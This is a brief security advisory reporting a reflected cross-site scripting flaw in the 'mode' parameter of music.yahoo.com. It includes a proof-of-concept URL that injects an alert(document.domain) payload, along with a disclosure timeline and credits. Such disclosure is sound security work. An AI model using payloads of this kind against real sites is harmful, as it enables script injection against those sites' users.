Advisory:		Yahoo Bug Bounty Program Vulnerability #6 Cross-site Scripting vulnerability
Advisory ID:		SSCHADV2013-YahooBB-006
Author:			Stefan Schurtz
Affected Software:	Successfully tested on music.yahoo.com
Vendor URL:		http://yahoo.com/
Vendor Status:		Not tested anymore
Bounty:			nothing
 
==========================
Vulnerability Description
==========================
 
The 'mode'-Paramter on "https://music.yahoo.com/" is prone to a Cross-site Scripting vulnerability
 
==========================
PoC-Exploit
==========================
 
http://music.yahoo.com/videos/?m_id=&m_mode=&instance_id= mode=multipart"-alert(document.domain)-"&__phase=pre&type=index

==========================
Disclosure Timeline
==========================
 
20-Jan-2014 - vendor informed by contact form (Yahoo Bug Bounty Program)

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2013-YahooBB-006.txt